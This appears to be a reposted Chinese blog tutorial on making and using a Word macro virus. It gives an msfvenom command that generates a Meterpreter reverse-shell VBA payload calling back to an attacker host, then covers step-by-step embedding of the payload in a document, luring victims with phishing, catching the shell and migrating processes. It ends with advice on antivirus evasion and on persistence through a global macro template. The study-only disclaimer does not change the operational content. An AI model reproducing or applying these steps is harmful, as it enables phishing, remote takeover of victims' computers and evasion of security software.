#############################
免责声明:本文仅作收藏学习之用,亦希望大家以遵守《网络安全法》相关法律为前提学习,切勿用于非法犯罪活动,对于恶意使用造成的损失,和本人及作者无关。
##############################
病毒简介:
宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上,攻击者甚至可以利用在宏代码中写入反弹shell脚本,诱骗受害者打开带有宏病毒的office文档,实现对其主机的远程控制。
实现过程:
1.首先实验攻击者利用本地(172.16.0.55)的Metasploit工具生成payload文件,生成名为jaky.vba的文件.
命令如下:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.0.55 LPORT=6666 -f vba -o JAky.vba
2.我们可以先cat一下这个文件,看看这跟文件里面payload的内容。
3.也可以讲这个文件放到网站根目录下面,通过网站的方式打开这个文件, 查看生成的payload
4.将vba代码录入宏中,我们可以先新建一个word文档。
5.打开word文档,默认情况下,宏是关闭的,进入信任中心,点击信任中心设置,手动开启一下。
6.开始设置宏内容:宏的名字可以任意命名,点击“创建”出现宏的编辑器。
7.将之前生成的宏病毒payload,复制到新创建的宏里面。
8.将文档保存另存为包含宏的文档类型,这里其实也可以直接保存的。
9.保存后退出,并通过各种方式向受害者发送此钓鱼文档,并引诱其打开。
10.在kali上面设置监听模式等待对方点击文档,然后反弹shell
11.执行监听,然后诱骗点击文档,就可以看到反弹过来的shell了,拿到用户权限。当文档关闭的时候,该工作组会被关闭,所以建议做进程迁移。
12.更加恶劣的是,当这个宏病毒一旦注入到目标主机时,后面不管用户新建或者打开什么word文档,都会被反弹连接上来。
实验拓展:
1.实验过程中,这种简单的shellcode,可能会被杀毒软件报毒。对shellcode部分可以尝试做一下免杀处理。
2.如果创建的是全局宏,Office会在这个目录生成一个dotm文档:
C:Users(username)AppDataRoamingMicrosoftTemplates
注:全局宏是对于当前计算机所有文档对象有效,即文档本身不包含宏代码,也可以运行全局宏。但是本身的全局宏名字是随机生成的,所以要先创建一个全局宏,定义一下名字。打开其他文档时才能调用并执行代码。
这个全局宏中的文件:vbaProject.bin是包含了特征的文件,但是反病毒软件不会扫描这个文件,除非主动查杀。这个特性可以达到维持权限的作用。
原文始发于微信公众号(菜鸟小新):宏病毒的制作与利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论